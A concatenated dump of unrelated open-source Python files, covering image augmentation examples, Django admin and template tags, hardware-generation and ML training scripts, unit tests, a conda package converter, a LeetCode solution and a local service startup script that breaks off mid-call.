print("BB %d: (%.4f, %.4f, %.4f, %.4f) -> (%.4f, %.4f, %.4f, %.4f)" % (
i,
before.x1, before.y1, before.x2, before.y2,
after.x1, after.y1, after.x2, after.y2)
)
# image with BBs before/after augmentation (shown below)
image_before = bbs.draw_on_image(image, size=2)
image_after = bbs_aug.draw_on_image(image_aug, size=2, color=[0, 0, 255])
# ------------
save(
"examples_bounding_boxes",
"simple.jpg",
grid([image_before, image_after], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_rotation():
import imgaug as ia
from imgaug import augmenters as iaa
ia.seed(1)
image = ia.quokka(size=(256, 256))
bbs = ia.BoundingBoxesOnImage([
ia.BoundingBox(x1=65, y1=100, x2=200, y2=150),
ia.BoundingBox(x1=150, y1=80, x2=200, y2=130)
], shape=image.shape)
seq = iaa.Sequential([
iaa.Multiply((1.2, 1.5)), # change brightness, doesn't affect BBs
iaa.Affine(
rotate=45,
)
])
# Make our sequence deterministic.
# We can now apply it to the image and then to the BBs and it will
# lead to the same augmentations.
# IMPORTANT: Call this once PER BATCH, otherwise you will always get the
# exactly same augmentations for every batch!
seq_det = seq.to_deterministic()
# Augment BBs and images.
# As we only have one image and list of BBs, we use
# [image] and [bbs] to turn both into lists (batches) for the
# functions and then [0] to reverse that. In a real experiment, your
# variables would likely already be lists.
image_aug = seq_det.augment_images([image])[0]
bbs_aug = seq_det.augment_bounding_boxes([bbs])[0]
# print coordinates before/after augmentation (see below)
for i in range(len(bbs.bounding_boxes)):
before = bbs.bounding_boxes[i]
after = bbs_aug.bounding_boxes[i]
print("BB %d: (%d, %d, %d, %d) -> (%d, %d, %d, %d)" % (
i,
before.x1, before.y1, before.x2, before.y2,
after.x1, after.y1, after.x2, after.y2)
)
# image with BBs before/after augmentation (shown below)
image_before = bbs.draw_on_image(image, size=2)
image_after = bbs_aug.draw_on_image(image_aug, size=2, color=[0, 0, 255])
# ------------
save(
"examples_bounding_boxes",
"rotation.jpg",
grid([image_before, image_after], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_ooi():
import numpy as np
import imgaug as ia
import imgaug.augmenters as iaa
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
GREEN = [0, 255, 0]
ORANGE = [255, 140, 0]
RED = [255, 0, 0]
# Pad image with a 1px white and (BY-1)px black border
def pad(image, by):
image_border1 = ia.pad(image, top=1, right=1, bottom=1, left=1,
mode="constant", cval=255)
image_border2 = ia.pad(image_border1, top=by-1, right=by-1,
bottom=by-1, left=by-1,
mode="constant", cval=0)
return image_border2
# Draw BBs on an image
# and before doing that, extend the image plane by BORDER pixels.
# Mark BBs inside the image plane with green color, those partially inside
# with orange and those fully outside with red.
def draw_bbs(image, bbs, border):
image_border = pad(image, border)
for bb in bbs.bounding_boxes:
if bb.is_fully_within_image(image.shape):
color = GREEN
elif bb.is_partly_within_image(image.shape):
color = ORANGE
else:
color = RED
image_border = bb.shift(left=border, top=border)\
.draw_on_image(image_border, size=2, color=color)
return image_border
# Define example image with three small square BBs next to each other.
# Augment these BBs by shifting them to the right.
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=25, x2=75, y1=25, y2=75),
BoundingBox(x1=100, x2=150, y1=25, y2=75),
BoundingBox(x1=175, x2=225, y1=25, y2=75)
], shape=image.shape)
seq = iaa.Affine(translate_px={"x": 120})
image_aug, bbs_aug = seq(image=image, bounding_boxes=bbs)
# Draw the BBs (a) in their original form, (b) after augmentation,
# (c) after augmentation and removing those fully outside the image,
# (d) after augmentation and removing those fully outside the image and
# clipping those partially inside the image so that they are fully inside.
image_before = draw_bbs(image, bbs, 100)
image_after1 = draw_bbs(image_aug, bbs_aug, 100)
image_after2 = draw_bbs(image_aug, bbs_aug.remove_out_of_image(), 100)
image_after3 = draw_bbs(image_aug, bbs_aug.remove_out_of_image().clip_out_of_image(), 100)
# ------------
save(
"examples_bounding_boxes",
"ooi.jpg",
grid([image_before, image_after1, np.zeros_like(image_before), image_after2, np.zeros_like(image_before), image_after3], cols=2, rows=3),
#grid([image_before, image_after1], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_shift():
import imgaug as ia
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
# Define image and two bounding boxes
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=25, x2=75, y1=25, y2=75),
BoundingBox(x1=100, x2=150, y1=25, y2=75)
], shape=image.shape)
# Move both BBs 25px to the right and the second BB 25px down
bbs_shifted = bbs.shift(left=25)
bbs_shifted.bounding_boxes[1] = bbs_shifted.bounding_boxes[1].shift(top=25)
# Draw images before/after moving BBs
image = bbs.draw_on_image(image, color=[0, 255, 0], size=2, alpha=0.75)
image = bbs_shifted.draw_on_image(image, color=[0, 0, 255], size=2, alpha=0.75)
# ------------
save(
"examples_bounding_boxes",
"shift.jpg",
grid([image], cols=1, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_projection():
import imgaug as ia
from imgaug.augmentables.bbs import BoundingBox, BoundingBoxesOnImage
ia.seed(1)
# Define image with two bounding boxes
image = ia.quokka(size=(256, 256))
bbs = BoundingBoxesOnImage([
BoundingBox(x1=25, x2=75, y1=25, y2=75),
BoundingBox(x1=100, x2=150, y1=25, y2=75)
], shape=image.shape)
# Rescale image and bounding boxes
image_rescaled = ia.imresize_single_image(image, (512, 512))
bbs_rescaled = bbs.on(image_rescaled)
# Draw image before/after rescaling and with rescaled bounding boxes
image_bbs = bbs.draw_on_image(image, size=2)
image_rescaled_bbs = bbs_rescaled.draw_on_image(image_rescaled, size=2)
# ------------
save(
"examples_bounding_boxes",
"projection.jpg",
grid([image_bbs, image_rescaled_bbs], cols=2, rows=1),
quality=90
)
def chapter_examples_bounding_boxes_iou():
import numpy as np
import imgaug as ia
from imgaug.augmentables.bbs import BoundingBox
ia.seed(1)
# Define image with two bounding boxes.
image = ia.quokka(size=(256, 256))
bb1 = BoundingBox(x1=50, x2=100, y1=25, y2=75)
bb2 = BoundingBox(x1=75, x2=125, y1=50, y2=100)
# Compute intersection, union and IoU value
# Intersection and union are both bounding boxes. They are here
# decreased/increased in size purely for better visualization.
bb_inters = bb1.intersection(bb2).extend(all_sides=-1)
bb_union = bb1.union(bb2).extend(all_sides=2)
iou = bb1.iou(bb2)
# Draw bounding boxes, intersection, union and IoU value on image.
image_bbs = np.copy(image)
image_bbs = bb1.draw_on_image(image_bbs, size=2, color=[0, 255, 0])
image_bbs = bb2.draw_on_image(image_bbs, size=2, color=[0, 255, 0])
image_bbs = bb_inters.draw_on_image(image_bbs, size=2, color=[255, 0, 0])
image_bbs = bb_union.draw_on_image(image_bbs, size=2, color=[0, 0, 255])
image_bbs = ia.draw_text(
image_bbs, text="IoU=%.2f" % (iou,),
x=bb_union.x2+10, y=bb_union.y1+bb_union.height//2,
color=[255, 255, 255], size=13
)
# ------------
save(
"examples_bounding_boxes",
"iou.jpg",
grid([image_bbs], cols=1, rows=1),
quality=90
)
if __name__ == "__main__":
main()
|
risk/admin.py | dekoder/LogESP | 130 | 12691400 | <gh_stars>100-1000
from django.contrib import admin
# Register your models here.
from .models import AdvThreatSrcCategory, AdvThreatSrcType
from .models import AdvThreatSource
from .models import NonAdvThreatSrcClass, NonAdvThreatSrcCategory
from .models import NonAdvThreatSrcType, NonAdvThreatSource
from .models import AdvThreatEventCategory, AdvThreatEventType
from .models import NonAdvThreatEventType
from .models import AdvThreatEvent, NonAdvThreatEvent
from .models import VulnerabilityClass, VulnerabilityCategory, VulnerabilityType
from .models import ConditionClass, ConditionCategory, ConditionType
from .models import Vulnerability, RiskCondition
from .models import ImpactType, Impact
from .models import RiskResponseType, RiskResponse
admin.site.register(AdvThreatEventCategory)
admin.site.register(AdvThreatEventType)
admin.site.register(AdvThreatEvent)
admin.site.register(NonAdvThreatEventType)
admin.site.register(NonAdvThreatEvent)
admin.site.register(AdvThreatSrcCategory)
admin.site.register(AdvThreatSrcType)
admin.site.register(AdvThreatSource)
admin.site.register(NonAdvThreatSrcClass)
admin.site.register(NonAdvThreatSrcCategory)
admin.site.register(NonAdvThreatSrcType)
admin.site.register(NonAdvThreatSource)
admin.site.register(VulnerabilityClass)
admin.site.register(VulnerabilityCategory)
admin.site.register(VulnerabilityType)
admin.site.register(ConditionClass)
admin.site.register(ConditionCategory)
admin.site.register(ConditionType)
admin.site.register(Vulnerability)
admin.site.register(RiskCondition)
admin.site.register(ImpactType)
admin.site.register(Impact)
admin.site.register(RiskResponseType)
admin.site.register(RiskResponse)
|
templatetags/htk_tags.py | goztrk/django-htk | 206 | 12691417 | <reponame>goztrk/django-htk
# Python Standard Library Imports
import base64
import datetime
import json
import re
# Third Party (PyPI) Imports
import six.moves.urllib as urllib
# Django Imports
from django import template
from django.template.defaultfilters import stringfilter
from django.urls import reverse
from django.utils.safestring import SafeText
from django.utils.safestring import mark_safe
register = template.Library()
##################################################
# Filters
# Form Utilities
@register.filter()
def field_clsname(field):
clsname = field.field.widget.__class__.__name__
return clsname
@register.filter(is_safe=True)
def label_with_classes(value, arg):
attrs = {
'class': arg,
'className': arg,
}
html = value.label_tag(attrs=attrs)
return html
@register.filter(is_safe=True)
def react_field(field):
html = field.__str__()
html = re.sub(r' value="(.*?)"', r' defaultValue="\g<1>"', html)
html = re.sub(r' class="(.*?)"', r' className="\g<1>"', html)
if field.field.widget.__class__.__name__ == 'RadioSelect':
html = re.sub(r'checked="checked"', r'defaultChecked', html)
html = mark_safe(html)
return html
# Dictionary Utilities
@register.filter()
def get_item(dictionary, key):
value = dictionary.get(key)
return value
# String Utilities
@register.filter(is_safe=True)
def concat(value, arg):
result = str(value) + str(arg)
return result
@register.filter()
def zeropad(value, num_digits):
"""
"""
padded = str(value).zfill(num_digits)
return padded
@register.filter(is_safe=True)
def markdownify(value):
"""Converts Markdown string to HTML
"""
import markdown
html = markdown.markdown(value)
return html
@register.filter()
def atob(value):
"""Base64 decode
ASCII to Binary
"""
value = base64.b64decode(value)
return value
@register.filter()
def btoa(value):
"""Base64 encode
Binary to ASCII
"""
if type(value) in (str, SafeText):
value = value.encode('utf-8')
# Convert bytes to str for for use in template
value = base64.b64encode(value).decode('utf-8')
return value
# Maths
@register.filter()
def int_divide(value, arg):
return int(value) / int(arg)
@register.filter()
def float_divide(value, arg):
return 1.0 * int(value) / int(arg)
@register.filter()
def make_range(value):
return range(value)
# Formatters
@register.filter()
def currency(value):
from decimal import Decimal
value = Decimal(value).quantize(Decimal('0.01'))
return value
@register.filter()
def currency_symbol(value, symbol):
if len(value) > 0 and value[0] == '-':
sign = '-'
abs_value = value[1:]
else:
sign = ''
abs_value = value
result = '%s%s%s' % (sign, symbol, abs_value,)
return result
@register.filter()
def timestamp(value):
try:
formatted = datetime.datetime.fromtimestamp(value)
except AttributeError:
formatted = ''
return formatted
@register.filter()
def phonenumber(value, country='US'):
"""Formats a phone number for a country
"""
import phonenumbers
try:
formatted = phonenumbers.format_number(phonenumbers.parse(value, country), phonenumbers.PhoneNumberFormat.NATIONAL)
except:
formatted = value
return formatted
@register.filter(is_safe=True)
def obfuscate(value):
"""Obfuscates a string
"""
from htk.utils.obfuscate import html_obfuscate_string
result = html_obfuscate_string(value)
return result
@register.filter(is_safe=True)
def obfuscate_mailto(value, text=False):
"""Obfuscates a mailto link
"""
from htk.utils.obfuscate import html_obfuscate_string
email = html_obfuscate_string(value)
if text:
link_text = text
else:
link_text = email
result = '<a href="%s%s">%s</a>' % (
html_obfuscate_string('mailto:'),
email,
link_text,
)
return result
# Oembed
@register.filter(is_safe=True)
def oembed(value, autoplay=False):
from htk.lib.oembed.utils import get_oembed_html
html = get_oembed_html(value, autoplay=autoplay)
html = mark_safe(html)
return html
# Javascript-related
@register.filter()
def jsbool(value):
js_value = 'true' if bool(value) else 'false'
return js_value
@register.filter()
def jsondumps(value):
js_value = mark_safe(json.dumps(value))
return js_value
# Requests
@register.filter()
def http_header(value):
"""Converts Django HTTP headers to standard format
e.g.
HTTP_ACCEPT -> Accept
HTTP_CACHE_CONTROL -> Cache-Control
"""
parts = value.split('_')
header_parts = [part.title() for part in parts[1:]]
formatted = '-'.join(header_parts)
return formatted
##################################################
# Tags
@register.simple_tag(takes_context=True)
def get_django_setting(context, key):
"""Retrieves a Django setting and sets it on the context dictionary
"""
from django.conf import settings
if hasattr(settings, key):
value = getattr(settings, key)
context[key] = value
return ''
@register.simple_tag()
def htk_setting(key):
from htk.utils import htk_setting as _htk_setting
value = _htk_setting(key)
return value
@register.simple_tag()
def get_request_duration():
from htk.middleware.classes import RequestTimerMiddleware
timer = RequestTimerMiddleware.get_current_timer()
if timer:
duration = timer.duration()
else:
# TODO: fix get_current_timer()
duration = 0
return duration
##
# Load Assets
@register.simple_tag(takes_context=True)
def lesscss(context, css_file_path_base, media=None):
"""Determine whether to use LESS compilation on-the-fly or CSS files, and includes the appropriate one
"""
media = 'media="%s" ' % media if media else ''
values = {
'css_rel' : context.get('css_rel', 'stylesheet'),
'css_ext' : context.get('css_ext', 'css'),
'css_file_path_base' : css_file_path_base,
'media' : media,
}
html = '<link type="text/css" rel="%(css_rel)s" href="%(css_file_path_base)s.%(css_ext)s" %(media)s/>' % values
html = mark_safe(html)
return html
@register.simple_tag(takes_context=True)
def loadjs(context, js_file_path, jsx=False):
"""Include a JS file and append a static asset version string
"""
asset_version = context.get('asset_version')
if asset_version:
asset_version_str = '?v=%s' % asset_version
else:
asset_version_str = ''
values = {
'script_type' : 'text/babel' if jsx else 'text/javascript',
'js_file_path' : js_file_path,
'asset_version_str' : asset_version_str,
}
html = '<script type="%(script_type)s" src="%(js_file_path)s%(asset_version_str)s"></script>' % values
html = mark_safe(html)
return html
@register.simple_tag(takes_context=True)
def loadjsx(context, js_file_path):
html = loadjs(context, js_file_path, jsx=True)
return html
##
# Feature Flags
@register.simple_tag()
def is_feature_enabled(feature_name):
from htk.apps.features.utils import is_feature_enabled as _is_feature_enabled
is_enabled = _is_feature_enabled(feature_name)
return is_enabled
##
# ACL Tags
@register.simple_tag(takes_context=True)
def is_editable_by_context_user(context, obj):
user = context.get('user', None)
if user:
is_editable = obj.is_editable_by(user)
else:
is_editable = False
return is_editable
@register.simple_tag(takes_context=True)
def has_permission(context, permission_key):
request = context.get('request', {}).get('request', None)
user = request.user
if request and user.is_authenticated:
has_permission = user.has_perm(permission_key)
else:
has_permission = False
return has_permission
##
# Organizations
@register.simple_tag(takes_context=True)
def is_user_organization_owner(context, organization):
user = context.get('user', None)
if user:
is_owner = organization.has_owner(user)
else:
is_owner = False
return is_owner
@register.simple_tag(takes_context=True)
def is_user_organization_admin(context, organization):
user = context.get('user', None)
if user:
is_admin = organization.has_admin(user)
else:
is_admin = False
return is_admin
@register.simple_tag(takes_context=True)
def is_user_organization_member(context, organization):
user = context.get('user', None)
if user:
is_member = organization.has_member(user)
else:
is_member = False
return is_member
##
# Geolocations
@register.simple_tag()
def distance_from(obj, lat, lng, unit='mile'):
from htk.apps.geolocations.enums import DistanceUnit
from htk.apps.geolocations.models import AbstractGeolocation
if not isinstance(obj, AbstractGeolocation) and not hasattr(obj, 'distance_from'):
raise Exception('Not a Geolocation object or does not have a distance_from method')
distance_unit_map = {
'meter' : DistanceUnit.METER,
'kilometer' : DistanceUnit.KILOMETER,
'feet' : DistanceUnit.FEET,
'mile' : DistanceUnit.MILE,
}
distance_unit = distance_unit_map.get(unit)
if distance_unit is None:
raise Exception('Unknown distance unit: %s' % unit)
distance = obj.distance_from(lat, lng, distance_unit=distance_unit)
return distance
##
# Util Tags
@register.simple_tag()
def qrcode_image_url(qr_data):
"""Returns the URL to the QR Code image of `qr_data`
"""
if qr_data:
from htk.lib.qrcode.utils import generate_qr_key
from htk.utils import htk_setting
url_name = htk_setting('HTK_QR_IMAGE_URL_NAME')
if url_name:
qr_params = urllib.parse.urlencode(
{
'key': generate_qr_key(qr_data),
'data': qr_data,
}
)
image_url = '%s?%s' % (reverse(url_name), qr_params,)
else:
image_url = None
else:
image_url = None
return image_url
@register.simple_tag()
def credit_card_icon(credit_card_brand):
from htk.constants.icons import CREDIT_CARD_ICONS
from htk.constants.icons import DEFAULT_CREDIT_CARD_ICON
if credit_card_brand in CREDIT_CARD_ICONS:
credit_card_icon = CREDIT_CARD_ICONS[credit_card_brand]
else:
credit_card_icon = DEFAULT_CREDIT_CARD_ICON
return credit_card_icon
|
tests/extension/resolver_/nested_module/resolver_nested_module.py | akmaru/veriloggen | 232 | 12691426 | <filename>tests/extension/resolver_/nested_module/resolver_nested_module.py
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))))))
from veriloggen import *
import veriloggen.resolver.resolver as resolver
def mkSubLed():
m = Module('sub_blinkled')
width = m.Parameter('WIDTH', 8)
inc = m.Parameter('INC', 1)
clk = m.Input('CLK')
rst = m.Input('RST')
led = m.OutputReg('LED', width)
count = m.Reg('count', width + 10)
m.Always(Posedge(clk))(
If(rst)(
count(0)
).Else(
If(count == 1023)(
count(0)
).Else(
count(count + inc)
)
))
m.Always(Posedge(clk))(
If(rst)(
led( 0 )
).Else(
If(count == 1023)(
led(led + inc)
)
))
return m
def mkOrigLed():
m = Module('blinkled')
sub = mkSubLed()
width = m.Parameter('TOP_WIDTH', 16)
inc = m.Parameter('TOP_INC', 1)
clk = m.Input('CLK')
rst = m.Input('RST')
led0 = m.Output('LED0', width)
led1 = m.Output('LED1', width)
m.Instance(sub, 'inst_sub_blinkled_0',
params=[('WIDTH', width), ('INC', inc + 1)],
ports=[('CLK', clk), ('RST', rst), ('LED', led0)])
m.Instance(sub, 'inst_sub_blinkled_1',
params=[('WIDTH', width), ('INC', inc + 2)],
ports=[('CLK', clk), ('RST', rst), ('LED', led1)])
return m
def mkLed():
led = mkOrigLed()
return resolver.resolve(led)
if __name__ == '__main__':
led = mkLed()
verilog = led.to_verilog()
print(verilog)
|
social_rl/multiagent_tfagents/joint_attention/joint_attention_train_eval.py | DionysisChristopoulos/google-research | 23,901 | 12691478 | <filename>social_rl/multiagent_tfagents/joint_attention/joint_attention_train_eval.py
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Train and Eval multi-agent PPO for multi-agent gridworld.
Each agent learns an independent policy.
Note: this code always assumes the network has an RNN to track other agents'
state.
To run:
```bash tensorboard.sh --port=2222 --logdir /tmp/multigrid/ppo/
python -m multiagent_train_eval.py --root_dir=/tmp/multigrid/ppo/
```
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
from absl import app
from absl import flags
from absl import logging
import gin
from tf_agents.system import system_multiprocessing
# Import needed to trigger env registration, so pylint: disable=unused-import
from social_rl import gym_multigrid
from social_rl.multiagent_tfagents import football_gym_env
from social_rl.multiagent_tfagents import multiagent_gym_suite
from social_rl.multiagent_tfagents import multiagent_metrics
from social_rl.multiagent_tfagents import multiagent_ppo
from social_rl.multiagent_tfagents import multiagent_train_eval
from social_rl.multiagent_tfagents import utils
from social_rl.multiagent_tfagents.joint_attention import attention_ppo_agent
FLAGS = flags.FLAGS
flags.DEFINE_string('attention_bonus_type', 'kld',
'Method for computing attention bonuses.')
flags.DEFINE_float('bonus_ratio', 0.00, 'Final multiplier for bonus rewards.')
flags.DEFINE_integer('bonus_timescale', int(1e6),
'Attention bonuses scale linearly until this point.')
def main(_):
logging.set_verbosity(logging.INFO)
agent_class = functools.partial(
attention_ppo_agent.MultiagentAttentionPPO,
attention_bonus_type=FLAGS.attention_bonus_type,
bonus_ratio=FLAGS.bonus_ratio,
bonus_timescale=FLAGS.bonus_timescale
)
if 'academy' in FLAGS.env_name:
env_load_fn = football_gym_env.load
gin.bind_parameter('construct_attention_networks.use_stacks', True)
gin.bind_parameter('AttentionMultiagentPPOPolicy.use_stacks', True)
else:
env_load_fn = multiagent_gym_suite.load
multiagent_train_eval.train_eval(
FLAGS.root_dir,
env_load_fn=env_load_fn,
agent_class=agent_class,
env_name=FLAGS.env_name,
num_environment_steps=FLAGS.num_environment_steps,
collect_episodes_per_iteration=FLAGS.collect_episodes_per_iteration,
num_parallel_environments=FLAGS.num_parallel_environments,
replay_buffer_capacity=FLAGS.replay_buffer_capacity,
num_epochs=FLAGS.num_epochs,
num_eval_episodes=FLAGS.num_eval_episodes,
train_checkpoint_interval=FLAGS.train_checkpoint_interval,
policy_checkpoint_interval=FLAGS.policy_checkpoint_interval,
log_interval=FLAGS.log_interval,
summary_interval=FLAGS.summary_interval,
actor_fc_layers=(FLAGS.actor_fc_layers_size, FLAGS.actor_fc_layers_size),
value_fc_layers=(FLAGS.value_fc_layers_size, FLAGS.value_fc_layers_size),
lstm_size=(FLAGS.lstm_size,),
conv_filters=FLAGS.conv_filters,
conv_kernel=FLAGS.conv_kernel,
direction_fc=FLAGS.direction_fc,
debug=FLAGS.debug,
inactive_agent_ids=tuple(),
random_seed=FLAGS.random_seed,
reinit_checkpoint_dir=FLAGS.reinit_checkpoint_dir,
use_attention_networks=True)
if __name__ == '__main__':
flags.mark_flag_as_required('root_dir')
system_multiprocessing.handle_main(lambda _: app.run(main))
|
tests/integrations/modules/test_modules.py | cmalek/sentry-python | 1,213 | 12691479 | import sentry_sdk
from sentry_sdk.integrations.modules import ModulesIntegration
def test_basic(sentry_init, capture_events):
sentry_init(integrations=[ModulesIntegration()])
events = capture_events()
sentry_sdk.capture_exception(ValueError())
(event,) = events
assert "sentry-sdk" in event["modules"]
assert "pytest" in event["modules"]
|
test/dropout_test.py | alimhanif/blocksparse | 903 | 12691481 | #!/usr/bin/env python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow as tf
import blocksparse as bs
from tensorflow.python.ops import gradient_checker
def ceil_div(x, y):
return -(-x // y)
shapes = [
# [ [32, 32], [ [32, 1] ] ],
[ [ 64,], [ None, ] ],
[ [1024,], [ None, ] ],
[ [1023,], [ None, ] ],
[ [1024, 128], [ [1024, 1], [1, 128], None ] ],
[ [1023, 127], [ [1023, 1], [1, 127], None ] ],
[ [64, 64, 64], [ [64, 64, 1], [64, 1, 64], [1,64,64], [1,64,1], [64,1,1], [1,1,64], [1,1,1], None ] ],
[ [63, 63, 63], [ [63, 63, 1], [63, 1, 63], [1,63,63], [1,63,1], [63,1,1], [1,1,63], [1,1,1], None ] ],
[ [16,16,16,16,16], [ [16,16,16,16,1], None ] ],
]
class DropoutTest(tf.test.TestCase):
def testDropout(self):
config = tf.ConfigProto(
intra_op_parallelism_threads=1,
inter_op_parallelism_threads=1)
with self.test_session(config=config) as sess:
bs.set_entropy()
sess.run(tf.global_variables_initializer())
# with tf.device("/gpu:0"):
# x = tf.ones([10000])*-10.0
# g = bs.concrete_gate(x)
# g = sess.run(g)
# print(g.sum()/g.size)
# error = gradient_checker.compute_gradient_error(x, x.shape, g, g.shape) #, extra_feed_dict={ x: cpuX, m: mask }
# print(error)
for dtype in (tf.float16, ): #tf.float16, tf.bfloat16
for x_shape, mask_shapes in shapes:
for mask_shape in mask_shapes:
m_shape = x_shape if mask_shape is None else mask_shape
cpuO = np.ones(x_shape, dtype=np.float32)
cpuX = np.random.uniform(-1.0, 1.0, x_shape).astype(np.float16).astype(np.float32)
cpuM = np.random.randint(0, 2, size=m_shape, dtype=np.bool)
mask = np.zeros(ceil_div(cpuM.size, 32)*32, dtype=np.bool)
mask[:cpuM.size] = cpuM.reshape(-1)
mask = np.packbits(mask.reshape(-1,8)[:,::-1]).view(np.int32)
cpuY = cpuX * cpuM.astype(np.float32) * 2.0
with tf.device("/gpu:0"):
x = tf.placeholder(tf.float32, cpuX.shape)
m = tf.placeholder(tf.int32, mask.shape)
xf = bs.float_cast(x, dtype=dtype)
y, _ = bs.dropout(xf, keep_prob=0.5, mask=m, mask_shape=mask_shape)
y = bs.float_cast(y, dtype=tf.float32)
devY, = sess.run( [y,], feed_dict={ x: cpuX, m: mask } )
xf = bs.float_cast(x, dtype=dtype)
y, _ = bs.dropout(xf, keep_prob=0.8, mask_shape=mask_shape)
y = bs.float_cast(y, dtype=tf.float32)
devO, = sess.run( [y,], feed_dict={ x: cpuO } )
diff = np.abs(devY - cpuY)
print("dype: %8s x_shape: %-20s m_shape: %-20s err: %4.2f norm_sum: %4.2f" % ( dtype.name, str(x_shape), str(mask_shape), diff.sum(), devO.sum()/devO.size ))
#np.savetxt( "diff.txt", diff, fmt="%4.2f")
if __name__ == "__main__":
tf.test.main()
|
plugins/quetz_transmutation/quetz_transmutation/jobs.py | maresb/quetz | 108 | 12691499 | import json
import logging
import os
import shutil
from pathlib import Path
from tempfile import TemporaryDirectory
from conda_package_handling.api import _convert
from quetz.condainfo import calculate_file_hashes_and_size
from quetz.dao import Dao
from quetz.pkgstores import PackageStore
logger = logging.getLogger("quetz.plugins")
def transmutation(package_version: dict, config, pkgstore: PackageStore, dao: Dao):
filename: str = package_version["filename"]
channel: str = package_version["channel_name"]
package_format: str = package_version["package_format"]
package_name: str = package_version["package_name"]
platform = package_version["platform"]
version = package_version["version"]
build_number = package_version["build_number"]
build_string = package_version["build_string"]
uploader_id = package_version["uploader_id"]
info = json.loads(package_version["info"])
if package_format == "tarbz2" or not filename.endswith(".tar.bz2"):
return
fh = pkgstore.serve_path(channel, Path(platform) / filename)
with TemporaryDirectory() as tmpdirname:
local_file_name = os.path.join(tmpdirname, filename)
with open(local_file_name, "wb") as local_file:
# chunk size 10MB
shutil.copyfileobj(fh, local_file, 10 * 1024 * 1024)
fn, out_fn, errors = _convert(local_file_name, ".conda", tmpdirname, force=True)
if errors:
logger.error(f"transmutation errors --> {errors}")
return
filename_conda = os.path.basename(filename).replace('.tar.bz2', '.conda')
logger.info(f"Adding file to package store: {Path(platform) / filename_conda}")
with open(out_fn, 'rb') as f:
calculate_file_hashes_and_size(info, f)
f.seek(0)
pkgstore.add_package(f, channel, str(Path(platform) / filename_conda))
version = dao.create_version(
channel,
package_name,
"conda",
platform,
version,
build_number,
build_string,
filename_conda,
json.dumps(info),
uploader_id,
info["size"],
upsert=True,
)
if os.path.exists(out_fn):
os.remove(out_fn)
|
binary_tree_zigzag_level_order_traversal/solution.py | mahimadubey/leetcode-python | 528 | 12691529 | <gh_stars>100-1000
"""
Given a binary tree, return the zigzag level order traversal of its nodes'
values. (ie, from left to right, then right to left for the next level and
alternate between).
For example:
Given binary tree {3,9,20,#,#,15,7},
3
/ \
9 20
/ \
15 7
return its zigzag level order traversal as:
[
[3],
[20,9],
[15,7]
]
"""
# Definition for a binary tree node
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
# @param root, a tree node
# @return a list of lists of integers
def zigzagLevelOrder(self, root):
if root is None:
return []
res = []
queue = []
rev = False # Reverse direction
level = []
queue.append(root)
queue.append(None)
while queue:
root = queue.pop(0)
if root is None:
if queue:
queue.append(None)
res.append(level)
level = []
rev = not rev # Toggle direction
else:
if rev:
level.insert(0, root.val)
else:
level.append(root.val)
if root.left is not None:
queue.append(root.left)
if root.right is not None:
queue.append(root.right)
return res
|
tests/benchmarks/string-methods/format.py | abeaumont/Dictu | 116 | 12691536 | <filename>tests/benchmarks/string-methods/format.py
import time
start = time.perf_counter()
for _ in range(10000):
x = "{} {}".format("test", "test")
print(time.perf_counter() - start) |
bbcm/utils/logger.py | okcd00/BertBasedCorrectionModels | 158 | 12691540 | """
@Time : 2021-01-21 11:50:55
@File : logger.py
@Author : Abtion
@Email : <EMAIL>
"""
import logging
import os
import sys
def setup_logger(name, save_dir, distributed_rank):
logger = logging.getLogger(name)
logger.setLevel(logging.DEBUG)
# don't log results for the non-master process
if distributed_rank > 0:
return logger
ch = logging.StreamHandler(stream=sys.stdout)
ch.setLevel(logging.DEBUG)
formatter = logging.Formatter("%(asctime)s %(name)s %(levelname)s: %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
if save_dir:
if not os.path.exists(save_dir):
os.makedirs(save_dir)
fh = logging.FileHandler(os.path.join(save_dir, "log.txt"), encoding='utf8')
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
|
loop_if_else_break.py | NightmareQAQ/python-notes | 106 | 12691551 | def contains_magic_number(list1, magic_number):
for i in list1:
if i == magic_number:
print("This list contains the magic number")
# if not add break , will run more meaningless loop
break
else:
print("This list does NOT contain the magic number")
if __name__ == "__main__":
contains_magic_number(range(10), 3)
|
startup.py | ExE-Boss/mdn-samples-server | 900 | 12691553 | <reponame>ExE-Boss/mdn-samples-server
#!/usr/bin/python
#
# MDN Sample Server
# Start up samples as needed.
#
# Any copyright is dedicated to the Public Domain.
# http://creativecommons.org/publicdomain/zero/1.0/
#
import os
import sys
import subprocess
import pwd
#
# startService
#
# Given a path, start up the service contained in that directory.
# This is done by running the "startup.sh" script in each directory.
# The bash shell is used.
#
def startService(path):
print("Starting service: " + path)
startupScript = path + "/" + "startup.sh"
if os.path.exists(startupScript):
sys.stdout.flush()
# pw_record = pwd.getpwnam("apache")
# env = os.environ.copy()
# env['HOME'] = pw_record.pw_dir
# env['LOGNAME'] = pw_record.pw_name
# env['PWD'] = path
# env['USER'] = pw_record.pw_name
process = subprocess.Popen(
